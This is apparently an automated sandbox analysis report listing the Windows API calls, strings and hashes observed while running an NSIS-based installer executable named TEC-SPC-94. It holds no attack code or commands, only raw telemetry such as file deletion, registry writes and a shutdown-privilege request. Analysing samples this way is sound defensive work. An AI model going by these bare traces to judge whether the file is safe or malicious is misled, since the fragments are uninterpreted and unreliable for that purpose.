                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Times New Roman
                                                          • API String ID: 3808545654-927190056
                                                          • Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                          • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                          • Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                          • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                          • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                          • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                          • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          • Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                          • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                          • Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                          • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp
                                                          • API String ID: 1356686001-3354810224
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00405999
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004059A3
                                                          • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405993
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-3936084776
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403861,76233420,0040366C,?), ref: 004038A4
                                                          • GlobalFree.KERNEL32(?), ref: 004038AB
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-3936084776
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 004059E5
                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 004059F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-3125694417
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                          • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                          • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-1875889550
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,00436800,76232EE0,00434000), ref: 004057F9
                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040586A
                                                          • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: \*.*
                                                          • API String ID: 2035342205-1173974218
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          • API String ID: 2295610775-3088156181
                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
